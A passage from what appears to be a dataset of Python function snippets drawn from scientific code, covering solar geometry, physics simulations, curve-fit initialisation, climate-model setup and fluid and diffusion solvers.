EOT + 4 * longitude - 60 * timezone)%1440\n if TST / 4 < 0:\n Omega = TST/4+180\n else:\n Omega = TST/4 - 180 \n Omega_r = m.radians(Omega)\n \n cos_Zenith = np.sin(lat_r) * np.sin(Delta_r) + np.cos(lat_r) * np.cos(Delta_r) * np.cos(Omega_r)\n Zenith_r = np.arccos(cos_Zenith) #in radians\n Aprime_r = np.arccos((np.sin(lat_r) * np.cos(Zenith_r) - np.sin(Delta_r)) / (np.cos(lat_r) * np.sin(Zenith_r)))\n Aprime = Aprime_r / np.pi * 180\n if Omega > 0:\n Azimuth = (Aprime + 180) % 360 #in degrees\n else:\n Azimuth = (540 - Aprime) % 360 #in degrees \n Azimuth_r = Azimuth / 180 * np.pi\n Elev_angle = (np.pi)/2 - Zenith_r\n\n \n # calculate incidence angle\n # Beta is equal to angle of tilted surface to horizontal (in radians)\n Beta = 45 # in degrees\n Beta_r = m.radians(Beta)\n \n cos_incidence = np.sin(Delta_r)* np.sin(lat_r) * np.cos(Beta_r) - np.sin(Delta_r) * np.cos(lat_r) * np.sin(Beta_r) * np.cos(Azimuth_r) + np.cos(Delta_r) * np.cos(lat_r) * np.cos(Beta_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(lat_r) * np.sin(Beta_r) * np.cos(Azimuth_r) * np.cos(Omega_r) + np.cos(Delta_r) * np.sin(Beta_r) * np.sin(Azimuth_r) * np.sin(Omega_r) \n incidence_ang_r = np.arccos(cos_incidence)\n \n return Delta_r, lat_r, Omega_r, Zenith_r, Azimuth_r, Elev_angle", "def init_env_variables(self):\n self.total_distance_moved = 0.0\n self.current_y_distance = self.get_y_dir_distance_from_start_point(self.start_point)\n self.cart_current_speed = rospy.get_param('/cart_pole_3d/init_cart_vel')", "def get_age_grad(self,renew=False):\n\t\ttry:\n\t\t\tdriv_lat = self['deriv_lat'].value\n\t\t\tdriv_lon = self['deriv_lon'].value\n\t\t\tdriv_msk = self['deriv_msk'].value\n\t\texcept:\n\t\t\tself._cal_age_grad()\n\t\tderiv_lat = self['deriv_lat'].value\n\t\tderiv_lon = self['deriv_lon'].value\n\t\tderiv_msk = self['deriv_msk'].value\n\t\tage_lon_Vec = self['age_lon_Vec'].value\n\t\tage_lat_Vec = self['age_lat_Vec'].value\n\t\txx, yy = np.meshgrid(age_lon_Vec, age_lat_Vec) # xx for longitude, yy for latitude\n\t\txx = xx.reshape(xx.size)\n\t\tyy = yy.reshape(yy.size)\n\t\tf_deriv_lat = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_lat.reshape(deriv_lat.size),rescale=False)\n\t\tf_deriv_lon = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_lon.reshape(deriv_lon.size),rescale=False)\n\t\tf_deriv_msk = NearestNDInterpolator(np.column_stack((xx,yy)),deriv_msk.reshape(deriv_msk.size),rescale=False)\n\t\tfor period in self.attrs['prd_arr']:\n\t\t\tgroup = self['%g_sec'%( period )]\n\t\t\tlons_orig = group['lonArr'].value\n\t\t\tlons = lons_orig.reshape(lons_orig.size)\n\t\t\tlats = group['latArr'].value.reshape(lons_orig.size)\n\t\t\tderiv_lat_Arr = f_deriv_lat(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tderiv_lon_Arr = f_deriv_lon(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tderiv_msk_Arr = f_deriv_msk(np.column_stack((lons,lats))).reshape(lons_orig.shape)\n\t\t\tif renew:\n\t\t\t\tdel group['age_deriv_lat_Arr']\n\t\t\t\tdel group['age_deriv_lon_Arr']\n\t\t\t\tdel group['age_deriv_msk_Arr']\n\t\t\tgroup.create_dataset(name='age_deriv_lat_Arr', data=deriv_lat_Arr)\n\t\t\tgroup.create_dataset(name='age_deriv_lon_Arr', data=deriv_lon_Arr)\n\t\t\tgroup.create_dataset(name='age_deriv_msk_Arr', data=deriv_msk_Arr)\n\t\tpass", "def initialise(self, initial=None):\r\n ticy = python_time.clock()\r\n if hasattr(self, 'redef_F_laplacian') or \\\r\n hasattr(self, 'redef_f_norm_grad'):\r\n print(\"ht3_solver:\\tVariables resassigned to known solution.\")\r\n assert (hasattr(self, 'redef_F_laplacian'))\r\n assert (hasattr(self, 'redef_f_norm_grad'))\r\n self.redefined = True\r\n\r\n self._print_setup()\r\n\r\n # Add all elem DoFs to NodeMapping\r\n for elem in self.mesh.elems.values():\r\n self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n\r\n # Set initial condition.\r\n t0 = np.zeros(self.node_map.count, dtype=np.float64)\r\n if initial is None:\r\n for elem in self.mesh.elems.values():\r\n idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n t0[idxs[:elem.dnen()]] = self.initial_temperature\r\n else:\r\n for elem in self.mesh.elems.values():\r\n idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())\r\n coords = elem.node_coords()\r\n for i in range(len(idxs)):\r\n t0[idxs[i]] = initial(coords[i, 0], coords[i, 1])\r\n self.lst_tmp = t0\r\n\r\n # Just to have the correct length list. Should be skipped over anyway.\r\n self.lst_rad = [np.zeros(len(t0), dtype=np.float64)\r\n for a in self.fq_list]\r\n # Setup constant matrices\r\n self.uv_vol = et.elems_2_csc(self.mesh,\r\n et.uv_mtrx,\r\n self.node_map)\r\n self.uv_vol.description = \"Integral of test function * weight \" \\\r\n + \"over element volumes.\"\r\n self.guv_vol = et.elems_2_csc(self.mesh,\r\n et.gu_gv_mtrx,\r\n self.node_map)\r\n self.guv_vol.description = \"Integral of test function laplacian *\" \\\r\n + \" weight function laplacian over element volumes.\"\r\n self.uv_bound = et.edge_2_csc(self.mesh,\r\n \"Boundary\",\r\n et.uv_mtrx,\r\n self.node_map)\r\n self.uv_bound.description = \"Integral of test function * weight \" \\\r\n + \" function over domain boundary.\"\r\n self._print_matrix_info(self.uv_vol, \"UV over volume\")\r\n self._print_matrix_info(self.guv_vol, \"Grad U dot Grad V over volume\")\r\n self._print_matrix_info(self.uv_bound, \"UV over boundary\")\r\n tocy = python_time.clock()\r\n print(\"ht3_solver:\\tCompleted initialisation in \" + str(tocy - ticy)\r\n + \" s.\")", "def get_initial_params(self, x, y, yerr):\n p = [0,0]\n p[1] = min(y)\n p[0] = (max(y)-min(y))/(max(x)-min(x))\n return array(p)", "def _initialise_run(self) -> None:\n assert self._coords is not None and self._species is not None\n\n if np.isclose(self._coords.delta, 0.0):\n raise RuntimeError(\"Zero distance between the dimer points\")\n\n self._coords._g = np.zeros(shape=(3, 3 * self._species.n_atoms))\n\n # TODO: Hessian. Ref [1] shows that a BFGS step to the translation\n # and rotation -> faster convergence than SD steps\n\n self._update_gradient_at(DimerPoint.midpoint)\n self._update_gradient_at(DimerPoint.left)\n\n return None", "def __init__(self,\n time_step: float,\n acceleration: Callable[[float], float],\n initial_value: float = 0.0,\n initial_velocity: float = 0.0,\n num_steps: int = 50,\n collected_data: Iterable[Dict[str, float]] = [],\n time_cumulation: float = 100,\n acceleration_error_constant: float = 10.0,\n start_time: float = 0.0):\n self.acceleration = acceleration\n self._timestep = time_step\n self._start_time = start_time\n\n self._previous_values = [None] * num_steps\n self._previous_values[0] = initial_value\n self._previous_values[1] = (\n time_step * initial_velocity + initial_value)\n\n self._initial_value = initial_value\n self._initial_velocity = initial_velocity\n\n self._num_steps = num_steps\n self._max_collected_data_time: float = max(\n map(operator.itemgetter('time'), collected_data), default=0.0)\n self._collected_data = collected_data\n self.feedback = unary_linear_interpolator.UnaryLinearInterpolator(\n list(map(operator.itemgetter('time'), collected_data)),\n list(map(operator.itemgetter('altitude'), collected_data)))\n\n self._last_index = self.fill_values(self._previous_values)\n\n self.past_n_steps = math.ceil(time_cumulation / (time_step * 1000))\n self._acceleration_error_constant = acceleration_error_constant\n self._velocity_storage = []", "def initializeValuesVectors(self):\n\n\t\tnCells = self.getNbins(\"f\")\n\t\tnCora = self.getNbins(\"i\")\n\t\tnCorb = self.getNbins(\"j\")\n\t\tnCorc = self.getNbins(\"k\")\n\t\tnDir = self.getNbins(\"d\")\n\t\tnUsr = self.getNbins(\"u\")\n\t\tnSeg = self.getNbins(\"s\")\n\t\tnMul = self.getNbins(\"m\")\n\t\tnCos = self.getNbins(\"c\")\n\t\tnErg = self.getNbins(\"e\")\n\t\tnTim = self.getNbins(\"t\")\n\n\t\tself.valsErrors = np.empty( ( nCells , nDir , nUsr , nSeg , nMul , nCos , nErg , nTim , nCora , nCorb , nCorc , 2 ) , dtype=float)\n\n\t\t#self.valsErrors = [[[[[[[[[[[[[] for _ in xrange(2)] for _ in xrange(nCorc)] for _ in xrange(nCorb)] for _ in xrange(nCora)] for _ in xrange(nTim)] \n\t\t#\t\t\t\t for _ in xrange(nErg)] for _ in xrange(nCos)] for _ in xrange(nMul)] for _ in xrange(nSeg)] for _ in xrange(nUsr)] \n\t\t#\t\t\t\t for _ in xrange(nDir)] for _ in xrange(nCells)]\n\n\t\tself.isInitialized = True", "def _calc_longitudes(self):\n assert self.tracers\n\n # zp is z unit vector at all times, shape 501 x 3\n zp = np.cross(self.p0_positions, self.p0_velocities)\n zp = zp / np.linalg.norm(zp, axis=-1)[:, None]\n\n # xp and yp are x and y unit vectors\n xp = self.p0_positions\n xp = xp / np.linalg.norm(xp, axis=-1)[:, None]\n yp = np.cross(zp, xp)\n\n # project particle positions into orbital x-y plane\n p1_xp = np.sum(self.p1_positions * xp[:, None, :], axis=-1)\n p1_yp = np.sum(self.p1_positions * yp[:, None, :], axis=-1)\n p2_xp = np.sum(self.p2_positions * xp[:, None, :], axis=-1)\n p2_yp = np.sum(self.p2_positions * yp[:, None, :], axis=-1)\n\n # get longitudes\n p1_phi = np.arctan2(p1_yp, p1_xp)\n p2_phi = np.arctan2(p2_yp, p2_xp)\n\n # add/subtract multiples of 2pi for particles on higher wraps.\n dp = np.vstack((np.zeros((1, self.N1)), np.diff(p1_phi, axis=0)))\n for j in range(self.N1):\n changes = np.where(np.abs(dp[:, j]) > 1.1 * pi)[0]\n for i in range(changes.size):\n p1_phi[changes[i]:, j] -= 2 * pi * np.sign(dp[changes[i], j])\n dp = np.vstack((np.zeros((1, self.N2)), np.diff(p2_phi, axis=0)))\n for j in range(self.N2):\n changes = np.where(np.abs(dp[:, j]) > 1.1 * pi)[0]\n for i in range(changes.size):\n p2_phi[changes[i]:, j] -= 2 * pi * np.sign(dp[changes[i], j])\n\n return p1_phi, p2_phi", "def init_pvelocity(self, individuals):\n for individual in individuals:\n # the initial speed is set to zero\n individual.features['velocity'] = [0] * len(individual.vector)\n\n return", "def initial_importer(initials, initialZMT=True):\n from .functions import cosd, lna\n ###filling the running variables with values depending on the systemconfiguration in rk4input###\n\n if Base.spatial_resolution == 0:\n dim = 0\n print('0D')\n Vars.T = initials['zmt']\n else:\n dim = 1\n # NS==True corresponds to southpole to northpole representation (180 Degrees)\n if Base.both_hemispheres == True:\n Latrange = 180\n\n # Checking if Temperature and Latitude is set on a latitudal circle (0°,10°,..if step=10)\n # or on a latitudinal belt and therefore between the boundaries (5°,15°,..if step=10)\n\n # circle==True and belt==False says on the latitudinal circle\n if Base.latitudinal_circle == True and Base.latitudinal_belt == False:\n Vars.Lat = np.linspace(-90 + Base.spatial_resolution, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution - 1))\n Vars.Lat2 = np.linspace(-90, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution - 1))\n # Checking if the Temperature for each latitude starts with the same value or a\n # cosine shifted value range\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n\n # circle==False and belt==True say on the latitudinal belt\n if Base.latitudinal_circle == False and Base.latitudinal_belt == True:\n Vars.Lat2 = np.linspace(-90 + Base.spatial_resolution, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution - 1))\n Vars.Lat = np.linspace(-90, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n if initials['initial_temperature_noise'] == True:\n z = [0] * len(Vars.Lat)\n for k in range(len(Vars.Lat)):\n z[k] = np.random.normal(0, initials['initial_temperature_noise_amplitude'])\n else:\n z = 0\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1) + lna(z)\n\n # Not from southpole to northpole rather equator to pole\n else:\n Latrange = 90\n if Base.latitudinal_circle == True and Base.latitudinal_belt == False:\n Vars.Lat = np.linspace(0, 90 - Base.spatial_resolution, int(Latrange / Base.spatial_resolution))\n Vars.Lat2 = np.linspace(0, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n if Base.latitudinal_circle == False and Base.latitudinal_belt == True:\n Vars.Lat2 = np.linspace(0, 90 - Base.spatial_resolution, int(Latrange / Base.spatial_resolution))\n Vars.Lat = np.linspace(0, 90 - Base.spatial_resolution,\n int(Latrange / Base.spatial_resolution)) + Base.spatial_resolution / 2\n if initialZMT == True:\n Vars.T = np.array([initials['zmt']] * int(Latrange / Base.spatial_resolution))\n if initials['initial_temperature_cosine'] == True:\n Vars.T = Vars.T + initials['initial_temperature_amplitude'] * (cosd(Vars.Lat) - 1)\n\n Vars.t = initials['time']\n if Base.parallelization == True:\n if initialZMT == True:\n Vars.T = np.array([Vars.T] * Base.number_of_parallels)\n Vars.T_global = np.array([initials['gmt']] * Base.number_of_parallels)\n else:\n Vars.T_global = initials['gmt']", "def init_pvelocity(self, population):\n for individual in population:\n # the initial speed is set to zero\n individual.features['velocity'] = [0] * len(individual.vector)\n\n return", "def __init__(self,):\r\n self.g = 9.81\r\n self.l = 0.5\r\n self.m1 = 1.0\r\n self.m2 = 1.0\r\n self.m3 = 1.0\r\n self.r1 = 1.0\r\n self.r2 = 1.0\r\n self.tau = 0.001\r\n self.theta1 = 1.0\r\n self.theta2 = 1.0\r\n self.theta3 = 1.0", "def get_initial_params(self, x, y, yerr):\n# p0 = zeros(self.max_phonons + 1)\n p0 = zeros(2)\n p0[0] = 100\n p0[1] = .1\n return p0", "def _core_init_params(self) :\n\t\ta_list,b_list = [],[]\n\t\tg_list,h_list = [],[]\n\t\t\n\t\t\n\t\tfor eqnid,eqn in enumerate(self.equations) : \n\t\t\treg_p = self.regressors[eqnid]['prod']\n\t\t\treg_d = self.regressors[eqnid]['degrad']\n\t\t\th_eqn = self.initsol['h'][eqn-1]\n\t\t\tg_eqn = self.initsol['g'][eqn-1]\n\n\n\t\t\ta_list.append(self.initsol['alpha'][eqn-1])\n\t\t\tb_list.append(self.initsol['beta'][eqn-1])\n\t\t\t\n\t\t\tg_eqn = np.array([g_eqn[reg-1] for reg in reg_p])\n\t\t\th_eqn = np.array([h_eqn[reg-1] for reg in reg_d])\n\t\t\th_list.append(h_eqn)\n\t\t\tg_list.append(g_eqn)\n\t\n\t\treturn (a_list,b_list,g_list,h_list)", "def initialize(self):\n#TODO: choose user defined START position\n values_type = np.dtype(float)\n self.visual_field = np.zeros(self.number_of_locs, dtype=values_type)\n self.weighted_sums = np.zeros(self.number_of_locs, dtype=values_type)\n self.prior_prob = 1.0 / np.prod(self.number_of_locs)\n self.post_probs = np.full(\n self.number_of_locs, self.prior_prob, dtype=values_type\n )\n starting_location = np.array(START)\n self.focus = get_index_of_in(starting_location,self.senzory_map)\n self.target_location = [\n x for x in xrange(self.number_of_locs) if x != self.focus\n ][random.randint(0,self.number_of_locs-2)]", "def comp_vel(p1=database['K+'], p2=database['pi+'], p3=database['p+'], pmin=0, pmax=80):\r\n p_range = np.linspace(pmin, pmax, 1000)\r\n m1 = p1.mass\r\n m2 = p2.mass\r\n m3 = p3.mass\r\n v1, v2, v3 = [], [], []\r\n for p in p_range:\r\n v1.append(c*beta(p, m1))\r\n v2.append(c*beta(p, m2))\r\n v3.append(c*beta(p, m3))\r\n fig = plt.figure(figsize=[10, 5])\r\n ax = fig.add_subplot(1, 1, 1)\r\n p1_name = r'K$^+$'\r\n p2_name = r'$\\pi^+$'\r\n p3_name = r'p$^+$'\r\n ax.plot(p_range, v1, 'r', label=p1_name)\r\n ax.plot(p_range, v2, 'b', label=p2_name)\r\n ax.plot(p_range, v3, 'g', label=p3_name)\r\n ax.set_xlabel('p / GeV', fontsize=20)\r\n ax.set_ylabel(r'v / $ms^{-1}$', fontsize=20)\r\n ax.axvline(75, color='k', label='p = 75 GeV')\r\n ax.set_xticks(np.arange(pmin, pmax+1, 1))\r\n ax.set_xticklabels(np.arange(pmin, pmax+1, 1))\r\n ax.grid()\r\n ax.minorticks_on()\r\n ax.set_xlim(pmin, pmax)\r\n# ax.set_ylim(np.min(v1+v2))\r\n ax.legend(fontsize=20)\r\n plt.show\r\n return", "def get_initial_params(self, x, y, yerr):\n ampl = y[0]\n offset = 0\n tau = log(y[-1] / float(y[0])) / (x[-1] - x[0])\n if self.amplitude != None:\n p0 = array([tau])\n else:\n if self.offset:\n p0 = array([tau, ampl, offset])\n else:\n p0 = array([tau, ampl])\n return p0", "def get_initial_params(self, x, y, yerr):\n estimated_height = max(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(max(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_height])\n return p0", "def get_initial_params(self, x, y, yerr):\n estimated_height = max(y)\n y1 = map(int, y *1000)\n estimated_position = x[ y1.index(max(y1)) ]\n estimated_width = (max(x) - min(x)) / 20.0\n p0 = array([estimated_position, estimated_width, estimated_height])\n return p0", "def _get_init_pose(self):\n return self.init_pose_R, self.init_pose_t", "def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm", "def update_variables(self):\n self.dl21 = self.l21-self.l11; self.dl22 = self.l22-self.l12; self.dl23 = self.l23-self.l13;\n self.kappa1, self.phi1, self.seg_len1 = self.configuration_space(self.l11, self.l12, self.l13, self.d, self.n)\n self.kappa2, self.phi2, self.seg_len2 = self.configuration_space(self.dl21, self.dl22, self.dl23, self.d, self.n)\n # aquire transformation matrices and tips for segment 1 and 2\n self.T01_bishop = self.transformation_matrix_bishop(self.kappa1, self.phi1, self.seg_len1)\n self.T12_bishop = self.transformation_matrix_bishop(self.kappa2, self.phi2, self.seg_len2)\n self.T02_bishop = np.matmul(self.T01_bishop, self.T12_bishop)\n self.T01_frenet = self.transformation_matrix_frenet(self.kappa1, self.phi1, self.seg_len1)\n self.T12_frenet = self.transformation_matrix_frenet(self.kappa2, self.phi2, self.seg_len2)\n self.T02_frenet = np.matmul(self.T01_frenet, self.T12_frenet)\n self.tip_vec1 = np.matmul(self.T01_bishop, self.base)[0:3]\n self.tip_vec2 = np.matmul(self.T02_bishop, self.base)[0:3]\n # Frenet frames\n self.normal_vec_frenet1 = self.T01_frenet[0:3, 0]\n self.binormal_vec_frenet1 = self.T01_frenet[0:3, 1]\n self.tangent_vec_frenet1 = self.T01_frenet[0:3, 2]\n self.normal_vec_frenet2 = self.T02_frenet[0:3, 0]\n self.binormal_vec_frenet2 = self.T02_frenet[0:3, 1]\n self.tangent_vec_frenet2 = self.T02_frenet[0:3, 2]\n # Bishop frames\n self.normal_vec_bishop1 = self.T01_bishop[0:3, 0]\n self.binormal_vec_bishop1 = self.T01_bishop[0:3, 1]\n self.tangent_vec_bishop1 = self.T01_bishop[0:3, 2]\n self.normal_vec_bishop2 = self.T02_bishop[0:3, 0]\n self.binormal_vec_bishop2 = self.T02_bishop[0:3, 1]\n self.tangent_vec_bishop2 = self.T02_bishop[0:3, 2]", "def initialize_momentum_velocity(parameters):\n\n\tL = len(parameters)//2\n\tv = {}\n\n\tfor l in xrange(L):\n\t\tv[\"dW\" + str(l+1)] = np.zeros(parameters[\"W\" + str(l+1)].shape)\n\t\tv[\"db\" + str(l+1)] = np.zeros(parameters[\"b\" + str(l+1)].shape)\n\n\treturn v", "def construct_linear_system(self):\n N=self.grid.Ncells()\n Nbc = len(self.dirichlet_bcs)\n self.Ncalc=Ncalc = N - Nbc\n\n # map cells to forced values\n dirichlet = dict( [ (c,v) for c,v,xy in self.dirichlet_bcs])\n\n self.is_calc_c = is_calc_c = np.ones(N,np.bool8)\n for c,v,xy in self.dirichlet_bcs:\n is_calc_c[c] = False\n\n # is_calc_c[self.c_mask] = False\n\n # c_map is indexed by real cell indices, and returns the matrix index\n c_map = self.c_map = np.zeros(N,np.int32)\n self.c_map[is_calc_c] = np.arange(Ncalc)\n\n dzc=self.dzc\n dzf=self.dzf\n area_c=self.area_c\n\n meth='coo' # 'dok'\n if meth == 'dok':\n A=sparse.dok_matrix((Ncalc,Ncalc),np.float64)\n else:\n # construct the matrix from a sequence of indices and values\n ij=[]\n values=[] # successive value for the same i.j will be summed\n \n b = np.zeros(Ncalc,np.float64)\n flux_per_gradient_j = -self.K_j * self.l_j * dzf / self.d_j * self.dt\n\n self.grid.edge_to_cells() # makes sure that edges['cells'] exists.\n \n for j in range(self.grid.Nedges()):\n e = self.grid.edges[j]\n ic1,ic2 = e['cells']\n \n if ic1<0 or ic2<0 or e['deleted']:\n continue # boundary edge, or deleted edge\n \n flux_per_gradient=flux_per_gradient_j[j]\n \n # this is the desired operation:\n # Cdiff[ic1] -= flux_per_gradient / (An[ic1]*dzc) * (C[ic2] - C[ic1])\n # Cdiff[ic2] += flux_per_gradient / (An[ic2]*dzc) * (C[ic2] - C[ic1])\n # Where Cdiff is row, C is col\n\n if is_calc_c[ic1] and is_calc_c[ic2]:\n mic2 = c_map[ic2]\n mic1 = c_map[ic1]\n v1=flux_per_gradient / (area_c[ic1]*dzc[ic1])\n v2=flux_per_gradient / (area_c[ic2]*dzc[ic2])\n \n if meth == 'dok':\n A[mic1,mic2] -= v1\n A[mic1,mic1] += v1\n A[mic2,mic2] += v2\n A[mic2,mic1] -= v2\n else:\n ij.append( (mic1,mic2) ) ; values.append(-v1)\n ij.append( (mic1,mic1) ) ; values.append(v1)\n ij.append( (mic2,mic2) ) ; values.append(v1)\n ij.append( (mic2,mic1) ) ; values.append(-v1)\n \n elif not ( is_calc_c[ic1] or is_calc_c[ic2] ):\n # both are dirichlet, so nothing to do\n pass\n elif not is_calc_c[ic2]:\n mic1 = c_map[ic1]\n v=flux_per_gradient / (self.area_c[ic1]*dzc[ic1])\n if meth == 'dok':\n A[mic1,mic1] += v\n else:\n ij.append( (mic1,mic1) )\n values.append(v)\n\n # roughly\n # A[1,1]*x[1] + A[1,2]*x[2] + ... = b[1]\n # but we already know x[2],\n # A[1,1]*x[1] + ... = b[1] - A[1,2]*x[2]\n # so flip the sign, multiply by known dirichlet value, and\n # add to the RHS\n b[mic1] += flux_per_gradient / (area_c[ic1]*dzc[ic1]) * dirichlet[ic2]\n else: # not is_calc_c[c1]\n mic2 = c_map[ic2]\n # A[mic2,mic2] += flux_per_gradient / (area_c[ic2]*dzc[ic2])\n # A[mic2,mic1] -= flux_per_gradient / (area_c[ic2]*dzc[ic2])\n\n # A[mic2,mic2]*x[2] + A[mic2,mic1]*x[1] = b[2]\n # ...\n # A[mic2,mic2]*x[2] - flux_per_gradient / (area_c[ic2]*dzc[ic2])*x[1] = b[2]\n # ...\n # A[mic2,mic2]*x[2] = b[2] + flux_per_gradient / (area_c[ic2]*dzc[ic2])*x[1]\n v=flux_per_gradient / (area_c[ic2]*dzc[ic2])\n if meth == 'dok':\n A[mic2,mic2] += v\n else:\n ij.append( (mic2,mic2) )\n values.append(v)\n b[mic2] += flux_per_gradient / (area_c[ic2]*dzc[ic2]) * dirichlet[ic1]\n\n # Used to test 'is not 0:' but modern python complains\n if isinstance(self.alpha,np.ndarray): \n for c in range(N):\n if self.is_calc_c[c]:\n mic=self.c_map[c]\n v=self.alpha[c]*self.dt\n if meth == 'dok':\n A[mic,mic] -= v\n else:\n ij.append( (mic,mic) )\n values.append(-v)\n\n # Flux boundary conditions:\n for ic,value,xy in self.neumann_bcs:\n mic=c_map[ic]\n # make mass/time into concentration/step\n # arrived at minus sign by trial and error.\n # 2023-08-04: there was a bug here that used ic2 instead of ic.\n b[mic] -= value/(area_c[ic]*dzc[ic]) * self.dt\n\n if meth == 'dok':\n self.A = sparse.coo_matrix(A)\n else:\n ijs=np.array(ij,dtype=np.int32)\n data=np.array(values,dtype=np.float64)\n A=sparse.coo_matrix( (data, (ijs[:,0],ijs[:,1]) ), shape=(Ncalc,Ncalc) )\n self.A=A\n \n # report scale to get a sense of whether dt is too large\n Ascale = A.diagonal().min()\n log.debug(\"Ascale is %s\"%Ascale)\n\n self.b = b", "def initialize(self):\n\n myg = grid_setup(self.rp, ng=4)\n\n bc_dens, bc_xodd, bc_yodd = bc_setup(self.rp)\n\n my_data = patch.CellCenterData2d(myg)\n\n my_data.register_var(\"density\", bc_dens)\n my_data.register_var(\"x-velocity\", bc_xodd)\n my_data.register_var(\"y-velocity\", bc_yodd)\n\n # we'll keep the internal energy around just as a diagnostic\n my_data.register_var(\"eint\", bc_dens)\n\n # phi -- used for the projections. The boundary conditions\n # here depend on velocity. At a wall or inflow, we already\n # have the velocity we want on the boundary, so we want\n # Neumann (dphi/dn = 0). For outflow, we want Dirichlet (phi\n # = 0) -- this ensures that we do not introduce any tangental\n # acceleration.\n bcs = []\n for bc in [self.rp.get_param(\"mesh.xlboundary\"),\n self.rp.get_param(\"mesh.xrboundary\"),\n self.rp.get_param(\"mesh.ylboundary\"),\n self.rp.get_param(\"mesh.yrboundary\")]:\n if bc == \"periodic\":\n bctype = \"periodic\"\n elif bc in [\"reflect\", \"slipwall\"]:\n bctype = \"neumann\"\n elif bc in [\"outflow\"]:\n bctype = \"dirichlet\"\n bcs.append(bctype)\n\n bc_phi = bnd.BC(xlb=bcs[0], xrb=bcs[1], ylb=bcs[2], yrb=bcs[3])\n\n my_data.register_var(\"phi-MAC\", bc_phi)\n my_data.register_var(\"phi\", bc_phi)\n\n # gradp -- used in the projection and interface states. We'll do the\n # same BCs as density\n my_data.register_var(\"gradp_x\", bc_dens)\n my_data.register_var(\"gradp_y\", bc_dens)\n\n my_data.create()\n\n self.cc_data = my_data\n\n # some auxiliary data that we'll need to fill GC in, but isn't\n # really part of the main solution\n aux_data = patch.CellCenterData2d(myg)\n\n aux_data.register_var(\"coeff\", bc_dens)\n aux_data.register_var(\"source_y\", bc_yodd)\n\n aux_data.create()\n self.aux_data = aux_data\n\n # we also need storage for the 1-d base state -- we'll store this\n # in the main class directly.\n self.base[\"rho0\"] = Basestate(myg.ny, ng=myg.ng)\n self.base[\"p0\"] = Basestate(myg.ny, ng=myg.ng)\n\n # now set the initial conditions for the problem\n problem = importlib.import_module(f\"pyro.lm_atm.problems.{self.problem_name}\")\n problem.init_data(self.cc_data, self.base, self.rp)\n\n # Construct beta_0\n gamma = self.rp.get_param(\"eos.gamma\")\n self.base[\"beta0\"] = Basestate(myg.ny, ng=myg.ng)\n self.base[\"beta0\"].d[:] = self.base[\"p0\"].d**(1.0/gamma)\n\n # we'll also need beta_0 on vertical edges -- on the domain edges,\n # just do piecewise constant\n self.base[\"beta0-edges\"] = Basestate(myg.ny, ng=myg.ng)\n self.base[\"beta0-edges\"].jp(1)[:] = \\\n 0.5*(self.base[\"beta0\"].v() + self.base[\"beta0\"].jp(1))\n self.base[\"beta0-edges\"].d[myg.jlo] = self.base[\"beta0\"].d[myg.jlo]\n self.base[\"beta0-edges\"].d[myg.jhi+1] = self.base[\"beta0\"].d[myg.jhi]", "def langevin_coefficients(\n temperature,\n dt,\n friction,\n masses):\n vscale = np.exp(-dt*friction)\n if friction == 0:\n fscale = dt\n else:\n fscale = (1-vscale)/friction\n kT = BOLTZ * temperature\n nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n invMasses = 1.0/masses\n sqrtInvMasses = np.sqrt(invMasses)\n\n ca = vscale\n cb = fscale*invMasses\n cc = nscale*sqrtInvMasses\n return ca, cb, cc", "def initial_vel(T,N,masses,dim):\r\n rand_v = np.random.uniform(-1,1,(N,dim)) #random velocities\r\n sum_v = np.sum(rand_v, axis = 0)/N #Total velocity\r\n rand_v = rand_v - sum_v #Subtract cm-Motion\r\n K = np.sum(np.sum(rand_v**2,axis = 1)*masses)/2 #Kinetic energy\r\n T_act = 2/3*K/sc.k/N #Temperature\r\n R_scale = T/T_act #Scaling factor\r\n v = np.transpose(rand_v*np.sqrt(R_scale)) #rescalte to reach T\r\n return v", "def _set_angular_velocity(self):\n nb_angular_velocities = 0\n sum_angular_velocities = 0\n for sl_id in range(self.nb_sl):\n w_list = self.sl_list[sl_id].angular_velocities\n nb_angular_velocities += len(w_list)\n sum_angular_velocities += np.sum(w_list)\n self.angular_velocity = sum_angular_velocities / nb_angular_velocities", "def first_lga(r, r_m, p, q):\n\n\t# Computation of the S/C velocity in the HRV frame\n\tP_HRV_ECI = np.linalg.inv(P_ECI_HRV())\n\tv_HRV = P_HRV_ECI.dot(r[3:])\n\n\t# Moon's velocity in the HRV\n\tv_M_HRV = np.array([0, 0, cst.V_M])\n\n\tv_inf, phi_m, theta_m = cart2sph(v_HRV - v_M_HRV)\n\n\t# S/C distance to the Earth [km]\n\td = np.linalg.norm(r[:3])\n\n\t# 1 - Computation of the polar angle of the S/C 